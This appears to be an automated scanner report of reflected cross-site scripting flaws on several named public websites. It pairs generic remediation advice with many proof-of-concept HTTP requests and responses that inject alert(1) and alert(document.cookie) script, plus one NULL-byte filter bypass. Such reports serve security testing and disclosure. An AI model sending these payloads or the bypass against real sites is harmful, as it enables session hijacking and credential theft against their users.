Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4ae33<script>alert(1)</script>3f481b83fd0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aj4ae33<script>alert(1)</script>3f481b83fd0/1064/0/vj?ajecscp=1292033222620&z=1&dim=144&pos=1 HTTP/1.1
Host: aj.600z.com
Proxy-Connection: keep-alive
Referer: http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?d26d5%3C/script%3E%3Cscript%3Ealertdocument.cookie)%3C/script%3E53c1268f75f=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=0
Response
HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Sat, 11 Dec 2010 02:20:49 GMT
Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /aj4ae33<script>alert(1)</script>3f481b83fd0/1064/0/vj not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 535c9<script>alert(1)</script>863c26eed60 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aj535c9<script>alert(1)</script>863c26eed60/1066/0/vj?ajecscp=1292033223014&z=1&dim=122&pos=2 HTTP/1.1
Host: aj.600z.com
Proxy-Connection: keep-alive
Referer: http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?d26d5%3C/script%3E%3Cscript%3Ealertdocument.cookie)%3C/script%3E53c1268f75f=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=0
Response
HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Sat, 11 Dec 2010 02:20:47 GMT
Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /aj535c9<script>alert(1)</script>863c26eed60/1066/0/vj not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cd490<script>alert(1)</script>ab50a3bc638 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ajcd490<script>alert(1)</script>ab50a3bc638/1067/0/vj?ajecscp=1292033223115&z=1&dim=122&pos=3 HTTP/1.1
Host: aj.600z.com
Proxy-Connection: keep-alive
Referer: http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?d26d5%3C/script%3E%3Cscript%3Ealertdocument.cookie)%3C/script%3E53c1268f75f=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=0
Response
HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Sat, 11 Dec 2010 02:20:54 GMT
Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /ajcd490<script>alert(1)</script>ab50a3bc638/1067/0/vj not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8b00b<script>alert(1)</script>b3037701840 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aj8b00b<script>alert(1)</script>b3037701840/1081/0/vj?ajecscp=1292033223116&z=1&dim=157 HTTP/1.1
Host: aj.600z.com
Proxy-Connection: keep-alive
Referer: http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?d26d5%3C/script%3E%3Cscript%3Ealertdocument.cookie)%3C/script%3E53c1268f75f=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=0
Response
HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Sat, 11 Dec 2010 02:20:52 GMT
Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /aj8b00b<script>alert(1)</script>b3037701840/1081/0/vj not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e2f43<script>alert(1)</script>d8e3c0cc6d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aje2f43<script>alert(1)</script>d8e3c0cc6d9/40616/0/vc?z=1&dim=24242 HTTP/1.1
Host: aj.600z.com
Proxy-Connection: keep-alive
Referer: http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?d26d5%3C/script%3E%3Cscript%3Ealertdocument.cookie)%3C/script%3E53c1268f75f=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Sat, 11 Dec 2010 02:20:55 GMT
Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /aje2f43<script>alert(1)</script>d8e3c0cc6d9/40616/0/vc not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6f378<script>alert(1)</script>10839d6a71d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aj6f378<script>alert(1)</script>10839d6a71d/40617/0/vj?ajecscp=1292033223081&z=1&dim=37872&pos=6 HTTP/1.1
Host: aj.600z.com
Proxy-Connection: keep-alive
Referer: http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?d26d5%3C/script%3E%3Cscript%3Ealertdocument.cookie)%3C/script%3E53c1268f75f=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=0
Response
HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Sat, 11 Dec 2010 02:20:53 GMT
Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /aj6f378<script>alert(1)</script>10839d6a71d/40617/0/vj not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e1d3b<script>alert(1)</script>26e9ba91aa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aje1d3b<script>alert(1)</script>26e9ba91aa/65356/0/vj?ajecscp=1292033222616&z=1&dim=65095 HTTP/1.1
Host: aj.600z.com
Proxy-Connection: keep-alive
Referer: http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?d26d5%3C/script%3E%3Cscript%3Ealertdocument.cookie)%3C/script%3E53c1268f75f=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=0
Response
HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Sat, 11 Dec 2010 02:20:46 GMT
Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /aje1d3b<script>alert(1)</script>26e9ba91aa/65356/0/vj not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dc14a<script>alert(1)</script>390f95c0e85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ajdc14a<script>alert(1)</script>390f95c0e85/65357/0/vj?ajecscp=1292033222616&z=1&dim=65096 HTTP/1.1
Host: aj.600z.com
Proxy-Connection: keep-alive
Referer: http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?d26d5%3C/script%3E%3Cscript%3Ealertdocument.cookie)%3C/script%3E53c1268f75f=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=0
Response
HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Sat, 11 Dec 2010 02:20:46 GMT
Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /ajdc14a<script>alert(1)</script>390f95c0e85/65357/0/vj not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3f915<script>alert(1)</script>cf68d7aa72a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aj3f915<script>alert(1)</script>cf68d7aa72a/65358/0/vj?ajecscp=1292033222621&z=1&dim=65097 HTTP/1.1
Host: aj.600z.com
Proxy-Connection: keep-alive
Referer: http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?d26d5%3C/script%3E%3Cscript%3Ealertdocument.cookie)%3C/script%3E53c1268f75f=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=0
Response
HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Sat, 11 Dec 2010 02:20:46 GMT
Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /aj3f915<script>alert(1)</script>cf68d7aa72a/65358/0/vj not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 79b53<script>alert(1)</script>2b6b3379968 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aj79b53<script>alert(1)</script>2b6b3379968/82077/0/vj?ajecscp=1292033222615&z=1&dim=82071 HTTP/1.1
Host: aj.600z.com
Proxy-Connection: keep-alive
Referer: http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?d26d5%3C/script%3E%3Cscript%3Ealertdocument.cookie)%3C/script%3E53c1268f75f=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=0
Response
HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Sat, 11 Dec 2010 02:20:46 GMT
Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /aj79b53<script>alert(1)</script>2b6b3379968/82077/0/vj not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 459a6<script>alert(1)</script>19da8255183 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aj459a6<script>alert(1)</script>19da8255183/89985/0/vj?ajecscp=1292033222621&z=1&dim=89984 HTTP/1.1
Host: aj.600z.com
Proxy-Connection: keep-alive
Referer: http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?d26d5%3C/script%3E%3Cscript%3Ealertdocument.cookie)%3C/script%3E53c1268f75f=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=0
Response
HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Sat, 11 Dec 2010 02:20:46 GMT
Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /aj459a6<script>alert(1)</script>19da8255183/89985/0/vj not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 19e64<script>alert(1)</script>8adee795dac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aj19e64<script>alert(1)</script>8adee795dac/90120/0/vj?ajecscp=1292033222988&z=1&dim=90124 HTTP/1.1
Host: aj.600z.com
Proxy-Connection: keep-alive
Referer: http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?d26d5%3C/script%3E%3Cscript%3Ealertdocument.cookie)%3C/script%3E53c1268f75f=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=0
Response
HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Sat, 11 Dec 2010 02:20:46 GMT
Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /aj19e64<script>alert(1)</script>8adee795dac/90120/0/vj not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8973d<script>alert(1)</script>4d1496bd2c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aj8973d<script>alert(1)</script>4d1496bd2c/90121/0/vj?z=1&dim=90125 HTTP/1.1
Host: aj.600z.com
Proxy-Connection: keep-alive
Referer: http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?d26d5%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E53c1268f75f=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=0; ajess1_AE79DE12732E6B02887A6D2D=a; ajcmp=1!#{%MR{%P4{%PJ!!{*Oy
Response
HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Sat, 11 Dec 2010 02:20:47 GMT
Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /aj8973d<script>alert(1)</script>4d1496bd2c/90121/0/vj not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 534d2<script>alert(1)</script>9711503da19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aj534d2<script>alert(1)</script>9711503da19/90122/0/vj?ajecscp=1292033223090&z=1&dim=90126 HTTP/1.1
Host: aj.600z.com
Proxy-Connection: keep-alive
Referer: http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?d26d5%3C/script%3E%3Cscript%3Ealertdocument.cookie)%3C/script%3E53c1268f75f=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=0
Response
HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Sat, 11 Dec 2010 02:20:52 GMT
Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /aj534d2<script>alert(1)</script>9711503da19/90122/0/vj not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b6800<script>alert(1)</script>bc05ef89ba3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ajb6800<script>alert(1)</script>bc05ef89ba3/90123/0/vj?ajecscp=1292033223073&z=1&dim=90127 HTTP/1.1
Host: aj.600z.com
Proxy-Connection: keep-alive
Referer: http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?d26d5%3C/script%3E%3Cscript%3Ealertdocument.cookie)%3C/script%3E53c1268f75f=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=0
Response
HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Sat, 11 Dec 2010 02:20:52 GMT
Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /ajb6800<script>alert(1)</script>bc05ef89ba3/90123/0/vj not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 238f0<script>alert(1)</script>58bfc9e7ef7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aj238f0<script>alert(1)</script>58bfc9e7ef7/93745/0/vj?ajecscp=1292033222976&z=1&dim=93742 HTTP/1.1
Host: aj.600z.com
Proxy-Connection: keep-alive
Referer: http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?d26d5%3C/script%3E%3Cscript%3Ealertdocument.cookie)%3C/script%3E53c1268f75f=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=0
Response
HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Sat, 11 Dec 2010 02:20:46 GMT
Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /aj238f0<script>alert(1)</script>58bfc9e7ef7/93745/0/vj not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d483b<script>alert(1)</script>124a55fed3b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ajd483b<script>alert(1)</script>124a55fed3b/93746/0/vj?ajecscp=1292033223001&z=1&dim=93743 HTTP/1.1
Host: aj.600z.com
Proxy-Connection: keep-alive
Referer: http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?d26d5%3C/script%3E%3Cscript%3Ealertdocument.cookie)%3C/script%3E53c1268f75f=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=0
Response
HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Sat, 11 Dec 2010 02:20:52 GMT
Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /ajd483b<script>alert(1)</script>124a55fed3b/93746/0/vj not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 69faa<script>alert(1)</script>834d52d2b26 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aj69faa<script>alert(1)</script>834d52d2b26/93747/0/vj?ajecscp=1292033222985&z=1&dim=93744 HTTP/1.1
Host: aj.600z.com
Proxy-Connection: keep-alive
Referer: http://www.webpronews.com/topnews/2009/05/26/online-brand-fraud-poses-challenge-to-marketers?d26d5%3C/script%3E%3Cscript%3Ealertdocument.cookie)%3C/script%3E53c1268f75f=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=0
Response
HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Sat, 11 Dec 2010 02:20:46 GMT
Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /aj69faa<script>alert(1)</script>834d52d2b26/93747/0/vj not found</pre> <BR>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a5492"><script>alert(1)</script>98a3a1c58a5 was submitted in the REST URL parameter 1. This input was echoed as a5492"><script>alert(1)</script>98a3a1c58a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /submit%00a5492"><script>alert(1)</script>98a3a1c58a5 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7cb08<img%20src%3da%20onerror%3dalert(1)>9ee651c84f9 was submitted in the REST URL parameter 1. This input was echoed as 7cb08<img src=a onerror=alert(1)>9ee651c84f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7cb08<img%20src%3da%20onerror%3dalert(1)>9ee651c84f9/LexUriServ.do HTTP/1.1
Host: eur-lex.europa.eu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 400 Bad Request
Cache-Control: no-cache="set-cookie"
Date: Sat, 11 Dec 2010 02:20:22 GMT
Content-Type: text/html
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 83
Connection: close
Set-Cookie: JSESSIONID=QsflNCfG4mHHGvBbpFC8v2SJGzLFXKJnLmCnn7g1G4cxxpKcKyz2!1864652219; path=/
Invalid path /7cb08<img src=a onerror=alert(1)>9ee651c84f9/LexUriServ was requested
1.21. http://kroll.com/include/document.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://kroll.com
Path: /include/document.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c32b'-alert(1)-'8827b24bbbf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /include/document.asp?9c32b'-alert(1)-'8827b24bbbf=1 HTTP/1.1
Host: kroll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=176843135.1292033507.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=176843135.1231045933.1292033507.1292033507.1292033507.1; __utmc=176843135; __utmb=176843135.1.10.1292033507; ASP.NET_SessionId=licmp0jhqg0pan243vatnhjv;
Response
HTTP/1.1 200 OK
Connection: close
Date: Sat, 11 Dec 2010 02:19:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 4169
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAABTQDSB=EKFGEPLAOIJHBLAFOMPHDIEJ; path=/
Cache-control: private
1.22. http://markmonitor.com/cta/wp-6steps/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://markmonitor.com
Path: /cta/wp-6steps/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac091"><a>818754f36d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cta/wp-6steps/?ac091"><a>818754f36d7=1 HTTP/1.1
Host: markmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=150829098.1288807326.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=150829098.1124917399.1288807326.1290021059.1292032512.4; __utmc=150829098; __utmb=150829098.1.10.1292032512;
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:19:36 GMT
Server: NOYB
X-Powered-By: PHP/5.3.3
Content-Length: 31984
Connection: close
Content-Type: text/html; charset=UTF-8
